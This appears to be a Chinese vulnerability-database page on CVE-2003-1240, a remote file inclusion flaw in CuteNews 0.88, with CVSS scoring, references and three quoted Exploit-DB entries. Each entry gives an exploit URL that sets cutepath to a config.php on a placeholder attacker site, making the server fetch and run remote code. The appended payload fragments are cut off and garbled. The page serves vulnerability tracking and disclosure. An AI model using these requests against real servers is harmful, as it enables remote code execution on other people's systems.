CVE-2003-1240
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:25
NMCOE    

[原文]PHP remote file inclusion vulnerability in CuteNews 0.88 allows remote attackers to execute arbitrary PHP code via a URL in the cutepath parameter in (1) shownews.php, (2) search.php, or (3) comments.php.


[CNNVD]CuteNews远程文件包含漏洞(CNNVD-200312-373)

        CuteNews 0.88版本存在漏洞。远程攻击者可以通过修改(1)shownews.php、(2)search.php或(3)comments.php中的cutepath参数以引用含config.php或news.txt的远程web服务器上的URL来执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1240
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1240
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-373
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6935
(UNKNOWN)  BID  6935
http://www.iss.net/security_center/static/11417.php
(UNKNOWN)  XF  cutenews-php-file-include(11417)
http://archives.neohapsis.com/archives/bugtraq/2003-02/0320.html
(UNKNOWN)  BUGTRAQ  20030225 PHP code injection in CuteNews

- 漏洞信息

CuteNews远程文件包含漏洞
高危 输入验证
2003-12-31 00:00:00 2006-03-28 00:00:00
远程  
        CuteNews 0.88版本存在漏洞。远程攻击者可以通过修改(1)shownews.php、(2)search.php或(3)comments.php中的cutepath参数以引用含config.php或news.txt的远程web服务器上的URL来执行任意PHP代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22283)

CuteNews 0.88 shownews.php Remote File Include Vulnerability (EDBID:22283)
php webapps
2003-02-25 Verified
0 Over_G
N/A [点击下载]
source: http://www.securityfocus.com/bid/6935/info

CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.

Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.example.com/cutenews/shownews.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------

/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?> 		

- 漏洞信息 (22284)

CuteNews 0.88 search.php Remote File Include Vulnerability (EDBID:22284)
php webapps
2003-02-25 Verified
0 Over_G
N/A [点击下载]
source: http://www.securityfocus.com/bid/6935/info
 
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
 
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
 
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.example.com/cutenews/search.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
 
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>		

- 漏洞信息 (22285)

CuteNews 0.88 comments.php Remote File Include Vulnerability (EDBID:22285)
php webapps
2003-02-25 Verified
0 Over_G
N/A [点击下载]
source: http://www.securityfocus.com/bid/6935/info
  
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
  
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
  
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

http://www.example.com/cutenews/comments.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
  
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>		

- 漏洞信息

5957
CuteNews shownews.php cutepath Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

CuteNews contains a flaw in the shownews.php script that may allow an attacker to execute arbitrary PHP code on the affected webserver. The issue is triggered when an attacker passes the URL of a malicious PHP script to the $cutepath variable from a web browser. It is possible that the flaw may allow execution of arbitrary code with the privileges of the target web server, resulting in a loss of integrity.

- 时间线

2003-02-25 Unknow
2003-02-25 Unknow

- 解决方案

Upgrade to version 1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站